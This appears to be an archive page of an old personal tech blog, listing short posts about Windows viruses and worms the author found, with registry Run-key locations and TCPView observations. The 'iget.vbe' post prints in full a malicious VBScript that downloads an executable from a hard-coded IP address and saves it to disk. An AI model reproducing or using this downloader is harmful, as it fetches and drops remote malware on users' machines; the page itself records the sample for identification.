-
Recent Posts
Recent Comments
Mike T. on Code snippet Using WMI via… Drew Canitz on minimal ATL window eskici on file transfer over synchronous… Rose on Purify reported error entry po… duongnguyenvan on file transfer over synchronous… Archives
- August 2018
- March 2018
- May 2017
- July 2012
- May 2012
- April 2012
- March 2012
- January 2012
- October 2011
- September 2011
- July 2011
- June 2011
- May 2011
- April 2011
- October 2010
- August 2010
- July 2010
- June 2010
- May 2010
- April 2010
- March 2010
- January 2010
- December 2009
- November 2009
- October 2009
- September 2009
- July 2009
- June 2009
- May 2009
- February 2009
- January 2009
- December 2008
- November 2008
- October 2008
- September 2008
- August 2008
- July 2008
- June 2008
- May 2008
- April 2008
- March 2008
- February 2008
- January 2008
- December 2007
- November 2007
- October 2007
- September 2007
- August 2007
- July 2007
- June 2007
- May 2007
- April 2007
- March 2007
- February 2007
- January 2007
- December 2006
- November 2006
- October 2006
- September 2006
- August 2006
- July 2006
- June 2006
- May 2006
- April 2006
- March 2006
- February 2006
- January 2006
- December 2005
- November 2005
Categories
Meta
Category Archives: Virus/Worm
iget.vbe
I just found a virus like file under c:\, the content is: Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://222.66.200.102:8080/1/3.exe",0xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "C\1.exe",2
Posted in Virus/Worm
Leave a comment
mravsc32.exe
This worm created a lot of TCP connection and affected normal internet usage. It will spawn another process once it is killed. Well, I can suspend it and then google a solution.
Posted in Virus/Worm
Leave a comment
sddriver.exe
sddriver.exe seems to be a worm, it initialed a lot of connections (can be seen in TCPView.exe) and affected normal use of web browser. It is found in the following registry entries, but the file is not found in disk.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunCall … Continue reading
Posted in Virus/Worm
Leave a comment
Firefox displays blank page for many urls
Today when I am surfing internet, suddenly Firefox can’t open new pages correctly — just be blank. After launching TCPView.exe I found rundll.exe (PID=4848) making lots of connection attempts, much like a virus/worm, so I killed it and firefox resumed … Continue reading
Posted in Virus/Worm
Leave a comment
wishs.exe — virus or worm?
Wishs.exe is found in the following registry[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]Microsoft=wishs.exe[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]Microsoft=wishs.exe[HKEY_USERS\.DEFAULT\Software\ASProtect]Microsoft=wishs.exe
Posted in Virus/Worm
1 Comment